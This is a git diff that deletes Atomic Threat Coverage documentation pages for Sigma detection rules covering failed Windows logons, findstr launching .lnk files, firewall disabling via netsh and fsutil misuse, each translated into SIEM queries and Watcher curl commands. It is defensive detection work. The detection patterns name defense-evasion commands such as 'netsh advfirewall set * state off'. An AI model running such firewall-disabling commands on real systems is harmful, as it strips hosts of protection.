-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4625\" AND (NOT ((winlog.channel:\"Security\" AND (winlog.event_data.IpAddress.keyword:*\\-* OR winlog.event_data.IpAddress.keyword:(10.* OR 192.168.* OR 172.16.* OR 172.17.* OR 172.18.* OR 172.19.* OR 172.20.* OR 172.21.* OR 172.22.* OR 172.23.* OR 172.24.* OR 172.25.* OR 172.26.* OR 172.27.* OR 172.28.* OR 172.29.* OR 172.30.* OR 172.31.* OR 127.* OR 169.254.*) OR winlog.event_data.IpAddress:\"\\:\\:1\" OR winlog.event_data.IpAddress.keyword:(fe80\\:\\:* OR fc00\\:\\:*))))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Failed Logon From Public IP'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4625" AND (NOT ((IpAddress.keyword:*\-* OR IpAddress.keyword:(10.* 192.168.* 172.16.* 172.17.* 172.18.* 172.19.* 172.20.* 172.21.* 172.22.* 172.23.* 172.24.* 172.25.* 172.26.* 172.27.* 172.28.* 172.29.* 172.30.* 172.31.* 127.* 169.254.*) OR IpAddress:"\:\:1" OR IpAddress.keyword:(fe80\:\:* fc00\:\:*)))))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4625" NOT ((source="WinEventLog:Security" (IpAddress="*-*" OR (IpAddress="10.*" OR IpAddress="192.168.*" OR IpAddress="172.16.*" OR IpAddress="172.17.*" OR IpAddress="172.18.*" OR IpAddress="172.19.*" OR IpAddress="172.20.*" OR IpAddress="172.21.*" OR IpAddress="172.22.*" OR IpAddress="172.23.*" OR IpAddress="172.24.*" OR IpAddress="172.25.*" OR IpAddress="172.26.*" OR IpAddress="172.27.*" OR IpAddress="172.28.*" OR IpAddress="172.29.*" OR IpAddress="172.30.*" OR IpAddress="172.31.*" OR IpAddress="127.*" OR IpAddress="169.254.*") OR IpAddress="::1" OR (IpAddress="fe80::*" OR IpAddress="fc00::*")))))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4625"  -((event_source="Microsoft-Windows-Security-Auditing" (IpAddress="*-*" OR IpAddress IN ["10.*", "192.168.*", "172.16.*", "172.17.*", "172.18.*", "172.19.*", "172.20.*", "172.21.*", "172.22.*", "172.23.*", "172.24.*", "172.25.*", "172.26.*", "172.27.*", "172.28.*", "172.29.*", "172.30.*", "172.31.*", "127.*", "169.254.*"] OR IpAddress="::1" OR IpAddress IN ["fe80::*", "fc00::*"]))))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4625)(?=.*(?!.*(?:.*(?:.*(?:.*.*-.*|.*(?:.*10\..*|.*192\.168\..*|.*172\.16\..*|.*172\.17\..*|.*172\.18\..*|.*172\.19\..*|.*172\.20\..*|.*172\.21\..*|.*172\.22\..*|.*172\.23\..*|.*172\.24\..*|.*172\.25\..*|.*172\.26\..*|.*172\.27\..*|.*172\.28\..*|.*172\.29\..*|.*172\.30\..*|.*172\.31\..*|.*127\..*|.*169\.254\..*)|.*::1|.*(?:.*fe80::.*|.*fc00::.*)))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_failed_logons_single_source.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_failed_logons_single_source.md
deleted file mode 100644
index 299d4ac..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_failed_logons_single_source.md
+++ /dev/null
@@ -1,312 +0,0 @@
-| Title                    | Failed Logins with Different Accounts from Single Source System       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious failed logins with different user accounts from a single source system |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1078: Valid Accounts](https://attack.mitre.org/techniques/T1078)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Terminal servers</li><li>Jump servers</li><li>Other multiuser systems like Citrix server farms</li><li>Workstations with frequently changing users</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Failed Logins with Different Accounts from Single Source System
-id: e98374a6-e2d9-4076-9b5c-11bdb2569995
-description: Detects suspicious failed logins with different user accounts from a single source system
-author: Florian Roth
-date: 2017/01/10
-tags:
-    - attack.persistence
-    - attack.privilege_escalation
-    - attack.t1078
-logsource:
-    product: windows
-    service: security
-detection:
-    selection1:
-        EventID:
-            - 529
-            - 4625
-        UserName: '*'
-        WorkstationName: '*'
-    selection2:
-        EventID: 4776
-        UserName: '*'
-        Workstation: '*'
-    timeframe: 24h
-    condition:
-        - selection1 | count(UserName) by WorkstationName > 3
-        - selection2 | count(UserName) by Workstation > 3
-falsepositives:
-    - Terminal servers
-    - Jump servers
-    - Other multiuser systems like Citrix server farms
-    - Workstations with frequently changing users
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "529" -or $_.ID -eq "4625") -and $_.message -match "UserName.*.*" -and $_.message -match "WorkstationName.*.*") }  | select WorkstationName, UserName | group WorkstationName | foreach { [PSCustomObject]@{'WorkstationName'=$_.name;'Count'=($_.group.UserName | sort -u).count} }  | sort count -desc | where { $_.count -gt 3 }
-```
-
-
-### es-qs
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_susp_failed_logons_single_source.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/e98374a6-e2d9-4076-9b5c-11bdb2569995 <<EOF
-{
-  "metadata": {
-    "title": "Failed Logins with Different Accounts from Single Source System",
-    "description": "Detects suspicious failed logins with different user accounts from a single source system",
-    "tags": [
-      "attack.persistence",
-      "attack.privilege_escalation",
-      "attack.t1078"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"529\" OR \"4625\") AND UserName.keyword:* AND winlog.event_data.WorkstationName.keyword:*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "24h"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"529\" OR \"4625\") AND UserName.keyword:* AND winlog.event_data.WorkstationName.keyword:*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          },
-          "aggs": {
-            "by": {
-              "terms": {
-                "field": "winlog.event_data.WorkstationName",
-                "size": 10,
-                "order": {
-                  "_count": "desc"
-                },
-                "min_doc_count": 4
-              },
-              "aggs": {
-                "agg": {
-                  "terms": {
-                    "field": "UserName",
-                    "size": 10,
-                    "order": {
-                      "_count": "desc"
-                    },
-                    "min_doc_count": 4
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.aggregations.by.buckets.0.agg.buckets.0.doc_count": {
-        "gt": 3
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Failed Logins with Different Accounts from Single Source System'",
-        "body": "Hits:\n{{#aggregations.agg.buckets}}\n {{key}} {{doc_count}}\n\n{{#by.buckets}}\n-- {{key}} {{doc_count}}\n{{/by.buckets}}\n\n{{/aggregations.agg.buckets}}\n",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/e98374a6-e2d9-4076-9b5c-11bdb2569995-2 <<EOF
-{
-  "metadata": {
-    "title": "Failed Logins with Different Accounts from Single Source System",
-    "description": "Detects suspicious failed logins with different user accounts from a single source system",
-    "tags": [
-      "attack.persistence",
-      "attack.privilege_escalation",
-      "attack.t1078"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4776\" AND UserName.keyword:* AND Workstation.keyword:*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "24h"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4776\" AND UserName.keyword:* AND Workstation.keyword:*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          },
-          "aggs": {
-            "by": {
-              "terms": {
-                "field": "Workstation",
-                "size": 10,
-                "order": {
-                  "_count": "desc"
-                },
-                "min_doc_count": 4
-              },
-              "aggs": {
-                "agg": {
-                  "terms": {
-                    "field": "UserName",
-                    "size": 10,
-                    "order": {
-                      "_count": "desc"
-                    },
-                    "min_doc_count": 4
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.aggregations.by.buckets.0.agg.buckets.0.doc_count": {
-        "gt": 3
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Failed Logins with Different Accounts from Single Source System'",
-        "body": "Hits:\n{{#aggregations.agg.buckets}}\n {{key}} {{doc_count}}\n\n{{#by.buckets}}\n-- {{key}} {{doc_count}}\n{{/by.buckets}}\n\n{{/aggregations.agg.buckets}}\n",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_susp_failed_logons_single_source.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="529" OR EventCode="4625") UserName="*" WorkstationName="*") | eventstats dc(UserName) as val by WorkstationName | search val > 3
-```
-
-
-### logpoint
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_susp_failed_logons_single_source.yml): Field mappings in aggregations must be single valued
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*529|.*4625))(?=.*.*)(?=.*.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_file_characteristics.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_file_characteristics.md
deleted file mode 100644
index cd25fcc..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_file_characteristics.md
+++ /dev/null
@@ -1,190 +0,0 @@
-| Title                    | Suspicious File Characteristics Due to Missing Fields       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1064: Scripting](https://attack.mitre.org/techniques/T1064)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://securelist.com/muddywater/88059/](https://securelist.com/muddywater/88059/)</li><li>[https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection](https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection)</li></ul>  |
-| **Author**               | Markus Neis, Sander Wiebing |
-| Other Tags           | <ul><li>attack.t1059.006</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious File Characteristics Due to Missing Fields
-id: 9637e8a5-7131-4f7f-bdc7-2b05d8670c43
-description: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe
-status: experimental
-references:
-    - https://securelist.com/muddywater/88059/
-    - https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection
-author: Markus Neis, Sander Wiebing
-date: 2018/11/22
-modified: 2020/05/26
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1064
-    - attack.t1059.006
-logsource:
-    product: windows
-    category: process_creation
-detection:
-    selection1:
-        Description: '\?'
-        FileVersion: '\?'
-    selection2:
-        Description: '\?'
-        Product: '\?'
-    selection3:
-        Description: '\?'
-        Company: '\?'
-    folder:
-        Image: '*\Downloads\\*'
-    condition: (selection1 or selection2 or selection3) and folder
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Unknown
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Description.*\?" -and ($_.message -match "FileVersion.*\?" -or $_.message -match "Product.*\?" -or $_.message -match "Company.*\?") -and $_.message -match "Image.*.*\\Downloads\\.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Description:"\?" AND (FileVersion:"\?" OR Product:"\?" OR Company:"\?") AND winlog.event_data.Image.keyword:*\\Downloads\\*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/9637e8a5-7131-4f7f-bdc7-2b05d8670c43 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious File Characteristics Due to Missing Fields",
-    "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1064",
-      "attack.t1059.006"
-    ],
-    "query": "(winlog.event_data.Description:\"\\?\" AND (FileVersion:\"\\?\" OR Product:\"\\?\" OR Company:\"\\?\") AND winlog.event_data.Image.keyword:*\\\\Downloads\\\\*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Description:\"\\?\" AND (FileVersion:\"\\?\" OR Product:\"\\?\" OR Company:\"\\?\") AND winlog.event_data.Image.keyword:*\\\\Downloads\\\\*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious File Characteristics Due to Missing Fields'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Description:"\?" AND (FileVersion:"\?" OR Product:"\?" OR Company:"\?") AND Image.keyword:*\\Downloads\\*)
-```
-
-
-### splunk
-    
-```
-(Description="\?" (FileVersion="\?" OR Product="\?" OR Company="\?") Image="*\\Downloads\\*") | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Description="\?" (FileVersion="\?" OR Product="\?" OR Company="\?") Image="*\\Downloads\\*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*\?)(?=.*(?:.*(?:.*\?|.*\?|.*\?)))(?=.*.*\Downloads\\.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_findstr_lnk.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_findstr_lnk.md
deleted file mode 100644
index 1d4f9cc..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_findstr_lnk.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | Findstr Launching .lnk File       |
-|:-------------------------|:------------------|
-| **Description**          | Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1202: Indirect Command Execution](https://attack.mitre.org/techniques/T1202)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1202: Indirect Command Execution](../Triggers/T1202.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/](https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/)</li></ul>  |
-| **Author**               | Trent Liffick |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Findstr Launching .lnk File
-id: 33339be3-148b-4e16-af56-ad16ec6c7e7b
-description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack
-status: experimental
-references:
-    - https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/
-tags:
-    - attack.defense_evasion
-    - attack.t1202
-author: Trent Liffick
-date: 2020/05/01
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image: '*\findstr.exe'
-        CommandLine: '*.lnk'
-    condition: selection
-fields:
-    - Image
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - unknown
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\findstr.exe" -and $_.message -match "CommandLine.*.*.lnk") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\findstr.exe AND winlog.event_data.CommandLine.keyword:*.lnk)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/33339be3-148b-4e16-af56-ad16ec6c7e7b <<EOF
-{
-  "metadata": {
-    "title": "Findstr Launching .lnk File",
-    "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1202"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\findstr.exe AND winlog.event_data.CommandLine.keyword:*.lnk)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\findstr.exe AND winlog.event_data.CommandLine.keyword:*.lnk)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Findstr Launching .lnk File'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n            Image = {{_source.Image}}\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\findstr.exe AND CommandLine.keyword:*.lnk)
-```
-
-
-### splunk
-    
-```
-(Image="*\\findstr.exe" CommandLine="*.lnk") | table Image,CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\findstr.exe" CommandLine="*.lnk")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\findstr\.exe)(?=.*.*\.lnk))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_firewall_disable.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_firewall_disable.md
deleted file mode 100644
index 513a506..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_firewall_disable.md
+++ /dev/null
@@ -1,173 +0,0 @@
-| Title                    | Firewall Disabled via Netsh       |
-|:-------------------------|:------------------|
-| **Description**          | Detects netsh commands that turns off the Windows firewall |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate administration</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/](https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/)</li><li>[https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/](https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/)</li></ul>  |
-| **Author**               | Fatih Sirin |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Firewall Disabled via Netsh
-id: 57c4bf16-227f-4394-8ec7-1b745ee061c3
-description: Detects netsh commands that turns off the Windows firewall
-references:
-    - https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/
-    - https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/
-date: 2019/11/01
-status: experimental
-author: Fatih Sirin
-tags:
-    - attack.defense_evasion
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - netsh firewall set opmode mode=disable
-            - netsh advfirewall set * state off
-    condition: selection
-falsepositives:
-    - Legitimate administration
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "netsh firewall set opmode mode=disable" -or $_.message -match "CommandLine.*netsh advfirewall set .* state off")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(netsh\ firewall\ set\ opmode\ mode\=disable OR netsh\ advfirewall\ set\ *\ state\ off)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/57c4bf16-227f-4394-8ec7-1b745ee061c3 <<EOF
-{
-  "metadata": {
-    "title": "Firewall Disabled via Netsh",
-    "description": "Detects netsh commands that turns off the Windows firewall",
-    "tags": [
-      "attack.defense_evasion"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(netsh\\ firewall\\ set\\ opmode\\ mode\\=disable OR netsh\\ advfirewall\\ set\\ *\\ state\\ off)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(netsh\\ firewall\\ set\\ opmode\\ mode\\=disable OR netsh\\ advfirewall\\ set\\ *\\ state\\ off)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Firewall Disabled via Netsh'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(netsh firewall set opmode mode=disable netsh advfirewall set * state off)
-```
-
-
-### splunk
-    
-```
-(CommandLine="netsh firewall set opmode mode=disable" OR CommandLine="netsh advfirewall set * state off")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["netsh firewall set opmode mode=disable", "netsh advfirewall set * state off"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*netsh firewall set opmode mode=disable|.*netsh advfirewall set .* state off)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_fsutil_usage.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_fsutil_usage.md
deleted file mode 100644
index 3fcfc6a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_fsutil_usage.md
+++ /dev/null
@@ -1,183 +0,0 @@
-| Title                    | Fsutil Suspicious Invocation       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size..). Might be used by ransomwares during the attack (seen by NotPetya and others) |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1070: Indicator Removal on Host](https://attack.mitre.org/techniques/T1070)</li><li>[T1551: None](https://attack.mitre.org/techniques/T1551)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1551: None](../Triggers/T1551.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Admin activity</li><li>Scripts and administrative tools used in the monitored environment</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
